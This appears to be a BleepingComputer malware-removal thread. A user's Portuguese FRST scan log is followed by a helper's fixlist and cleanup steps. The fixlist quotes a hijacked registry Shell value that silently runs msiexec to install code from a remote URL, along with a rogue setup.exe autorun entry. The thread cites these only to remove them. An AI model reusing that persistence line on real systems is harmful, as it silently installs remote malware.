2017-04-12 18:32 - 2017-01-06 16:32 - 00000000 ____D C:\Users\Biel\Documents\EGDownloads
2017-04-12 14:26 - 2009-07-14 01:45 - 00016944 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2017-04-12 14:26 - 2009-07-14 01:45 - 00016944 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2017-04-12 14:25 - 2009-07-14 14:55 - 00705798 _____ C:\Windows\system32\prfh0416.dat
2017-04-12 14:25 - 2009-07-14 14:55 - 00147638 _____ C:\Windows\system32\prfc0416.dat
2017-04-12 14:25 - 2009-07-14 02:13 - 01635826 _____ C:\Windows\system32\PerfStringBackup.INI
2017-04-12 14:25 - 2009-07-14 00:20 - 00000000 ____D C:\Windows\inf
2017-04-12 14:19 - 2017-01-21 09:27 - 00000000 ____D C:\Users\Biel\AppData\Roaming\uTorrent
2017-04-12 14:19 - 2016-12-29 11:58 - 00000000 ____D C:\Program Files (x86)\Steam
2017-04-12 14:19 - 2016-10-31 16:07 - 00101080 _____ (GAS Tecnologia) C:\Windows\system32\Drivers\wsddfac.sys
2017-04-12 14:19 - 2016-10-31 15:59 - 00000000 ____D C:\Users\Todos os Usuários\GbPlugin
2017-04-12 14:19 - 2016-10-31 15:59 - 00000000 ____D C:\ProgramData\GbPlugin
2017-04-12 14:19 - 2016-10-31 15:59 - 00000000 ____D C:\Program Files (x86)\GbPlugin
2017-04-12 14:19 - 2016-10-29 03:30 - 00000000 ____D C:\Users\Todos os Usuários\NVIDIA
2017-04-12 14:19 - 2016-10-29 03:30 - 00000000 ____D C:\ProgramData\NVIDIA
2017-04-12 14:19 - 2009-07-14 02:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2017-04-12 14:05 - 2016-11-01 15:55 - 00000000 ____D C:\Users\Biel\AppData\Local\CrashDumps
2017-04-11 19:00 - 2016-10-29 19:33 - 00003676 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-2097341823-3435128210-3467763070-1000UA
2017-04-11 19:00 - 2016-10-29 19:33 - 00003404 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-2097341823-3435128210-3467763070-1000Core
2017-04-11 16:22 - 2017-01-06 11:33 - 00000000 ____D C:\Users\Todos os Usuários\ProductData
2017-04-11 16:22 - 2017-01-06 11:33 - 00000000 ____D C:\ProgramData\ProductData
2017-04-11 13:25 - 2016-10-29 03:46 - 00802904 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2017-04-11 13:25 - 2016-10-29 03:46 - 00144472 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2017-04-11 13:25 - 2016-10-29 03:46 - 00004384 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater
2017-04-11 13:25 - 2016-10-29 03:46 - 00000000 ____D C:\Windows\SysWOW64\Macromed
2017-04-11 13:25 - 2016-10-29 03:46 - 00000000 ____D C:\Windows\system32\Macromed
2017-04-11 13:20 - 2017-01-06 11:44 - 00000000 ____D C:\Users\Biel\AppData\Roaming\ScreenShot
2017-04-10 21:27 - 2017-01-06 12:51 - 00000000 ____D C:\Users\Biel\Desktop\Gabriel
2017-04-10 21:04 - 2017-01-06 13:08 - 00000000 ____D C:\Users\Biel\Documents\GTA San Andreas User Files
2017-04-10 09:57 - 2017-01-06 13:14 - 00000000 ____D C:\Users\Biel\Desktop\Simone
2017-04-09 14:49 - 2017-01-08 12:59 - 00000000 ____D C:\Users\Todos os Usuários\AVAST Software
2017-04-09 14:49 - 2017-01-08 12:59 - 00000000 ____D C:\ProgramData\AVAST Software
2017-04-06 13:23 - 2009-07-14 02:08 - 00032608 _____ C:\Windows\Tasks\SCHEDLGU.TXT
2017-04-05 13:41 - 2017-01-08 13:02 - 00003896 _____ C:\Windows\System32\Tasks\SafeZone scheduled Autoupdate 1483891368
2017-04-05 13:41 - 2009-07-14 02:32 - 00000000 ____D C:\Program Files\Windows Sidebar
2017-04-04 18:42 - 2017-01-08 13:02 - 00032600 _____ (AVAST Software) C:\Windows\system32\Drivers\aswKbd.sys
2017-04-04 18:42 - 2017-01-08 13:00 - 01005048 _____ (AVAST Software) C:\Windows\system32\Drivers\aswSnx.sys
2017-04-04 18:42 - 2017-01-08 13:00 - 00556784 _____ (AVAST Software) C:\Windows\system32\Drivers\aswSP.sys
2017-04-04 18:42 - 2017-01-08 13:00 - 00339696 _____ (AVAST Software) C:\Windows\system32\Drivers\aswVmm.sys
2017-04-04 18:42 - 2017-01-08 13:00 - 00164064 _____ (AVAST Software) C:\Windows\system32\Drivers\aswStm.sys
2017-04-04 18:42 - 2017-01-08 13:00 - 00127112 _____ (AVAST Software) C:\Windows\system32\Drivers\aswMonFlt.sys
2017-04-04 18:42 - 2017-01-08 13:00 - 00101152 _____ (AVAST Software) C:\Windows\system32\Drivers\aswRdr2.sys
2017-04-04 18:42 - 2017-01-08 13:00 - 00075704 _____ (AVAST Software) C:\Windows\system32\Drivers\aswRvrt.sys
2017-04-04 18:42 - 2017-01-08 13:00 - 00038296 _____ (AVAST Software) C:\Windows\system32\Drivers\aswHwid.sys
2017-04-03 23:13 - 2016-10-29 03:43 - 00002368 _____ C:\Users\Biel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2017-04-01 10:28 - 2009-07-14 00:20 - 00000000 ____D C:\Windows\system32\NDF
2017-03-16 14:38 - 2017-03-07 16:50 - 00640783 _____ C:\Users\Biel\Documents\Apresentação1.pptx
2017-03-15 20:06 - 2017-02-06 18:47 - 00000000 ____D C:\Users\Biel\Desktop\Trabalhos
2017-03-15 14:37 - 2016-10-29 03:52 - 00000000 ____D C:\Users\Todos os Usuários\Package Cache
2017-03-15 14:37 - 2016-10-29 03:52 - 00000000 ____D C:\ProgramData\Package Cache
2017-03-15 14:37 - 2016-10-29 03:48 - 00000000 ____D C:\Users\Todos os Usuários\Skype
2017-03-15 14:37 - 2016-10-29 03:48 - 00000000 ____D C:\ProgramData\Skype
 
==================== Arquivos na raiz de alguns diretórios =======
 
2016-10-29 03:34 - 2016-10-29 03:34 - 0000000 ____H () C:\ProgramData\DP45977C.lfl
 
==================== Bamital & volsnap ======================
 
(Não há correção automática para arquivos que não passaram na verificação.)
 
C:\Windows\system32\winlogon.exe => O arquivo é assinado digitalmente
C:\Windows\system32\wininit.exe => O arquivo é assinado digitalmente
C:\Windows\SysWOW64\wininit.exe => O arquivo é assinado digitalmente
C:\Windows\explorer.exe => O arquivo é assinado digitalmente
C:\Windows\SysWOW64\explorer.exe => O arquivo é assinado digitalmente
C:\Windows\system32\svchost.exe => O arquivo é assinado digitalmente
C:\Windows\SysWOW64\svchost.exe => O arquivo é assinado digitalmente
C:\Windows\system32\services.exe => O arquivo é assinado digitalmente
C:\Windows\system32\User32.dll => O arquivo é assinado digitalmente
C:\Windows\SysWOW64\User32.dll => O arquivo é assinado digitalmente
C:\Windows\system32\userinit.exe => O arquivo é assinado digitalmente
C:\Windows\SysWOW64\userinit.exe => O arquivo é assinado digitalmente
C:\Windows\system32\rpcss.dll => O arquivo é assinado digitalmente
C:\Windows\system32\dnsapi.dll => O arquivo é assinado digitalmente
C:\Windows\SysWOW64\dnsapi.dll => O arquivo é assinado digitalmente
C:\Windows\system32\Drivers\volsnap.sys => O arquivo é assinado digitalmente
 
LastRegBack: 2017-04-03 21:55
 
==================== Fim de FRST.txt ============================
 
NEED HELP HERE PLEASE!!!

Edited by IDFs0ldier, 13 April 2017 - 10:38 AM.


BC AdBot (Login to Remove)

 


#2 nasdaq

nasdaq

  • Malware Response Team
  • 40,182 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:10:03 PM

Posted 14 April 2017 - 09:45 AM

Hello, Welcome to BleepingComputer.
I'm nasdaq and will be helping you.

If you can please print this topic it will make it easier for you to follow the instructions and complete all of the necessary steps in the order listed.
===

Press the windows key Windows_Logo_key.gif+ r on your keyboard at the same time. This will open the RUN BOX.
Type Notepad and and click the OK key.
Please copy the entire contents of the code box below to the a new file.
 
start

CreateRestorePoint:
EmptyTemp:
CloseProcesses:

HKU\S-1-5-21-2097341823-3435128210-3467763070-1000\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkPDQkEGRhnANcOTHcGdzkMTqyMWHcOWw5MF== /q
HKU\S-1-5-21-2097341823-3435128210-3467763070-1000\...\MountPoints2: {b740cf12-9ef6-11e6-a699-08626698bb3b} - F:\setup.exe
IFEO\taskmgr.exe: [Debugger]
GroupPolicy: Restrição <======= ATENÇÃO
CHR Extension: (Avast Online Security) - C:\Users\Biel\AppData\Local\Google\Chrome\User Data\Default\Extensions\gomekmidlodglbbmalcneegieacbdmki [2017-04-05]
CHR Extension: (Pagamentos da Chrome Web Store) - C:\Users\Biel\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-03-08]
CHR Extension: (Chrome Media Router) - C:\Users\Biel\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-04-04]
S1 gbpddfac; system32\drivers\gbpddfac64.sys [X]
S0 gbpddreg; system32\drivers\gbpddreg64.sys [X]
S3 Synth3dVsc; System32\drivers\synth3dvsc.sys [X]
S3 tsusbhub; system32\drivers\tsusbhub.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]

End
Save the file as fixlist.txt in the same folder where the Farbar tool is running from.
The location is listed in the 3rd line of the Farbar log you have submitted.

Run FRST and click Fix only once and wait.

The tool will create a log (Fixlog.txt) please post it to your reply.
===

Please download Malwarebytes Anti-Malware from here
  • Right-click on the MBAM icon and select Run as administrator to run the tool.
  • Click Yes to accept any security warnings that may appear.
  • Once the MBAM dashboard opens, on the right detail pane click on the word "Current" under the Scan Status to update the tool database.
  • On the left menu pane click the Settings tab, and then select the Protection tab on the top.
  • Under the Scan Options, turn on the button Scan for rootkits and Scan within archives.
  • Click the Scan tab on the right detail pane, select Threat Scan and click the Start Scan button
  • Note: The scan may take some time to finish, so please be patient.
  • If potential threats are detected, ensure to checkmark all the listed items, and click the Quarantine Selected button.
  • While still on the Scan tab, click the View Report button, and in the window that opens click the Export button, select Text file (*.txt), and save the log to your Desktop.
  • The log can also be viewed by clicking the log to select it, then clicking the View Report button.
Please post the log for my review.

Note: If asked to restart the computer, please do so immediately.
===

Open Google Chrome, click on menu icon google-chrome-setting-icon.png which is located right side top of the google chrome.
 
Click "Settings" then "Show advanced settings" at the bottom of the screen.
 
Click "Reset browser settings" button.
 
Restart Chrome.

Please post the logs and let me know what problem persists.

Include also for my review the Addition.txt log that was created by the Farbar tool.

#3 nasdaq

nasdaq

  • Malware Response Team
  • 40,182 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:10:03 PM

Posted 20 April 2017 - 07:40 AM

Are you still with me?




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users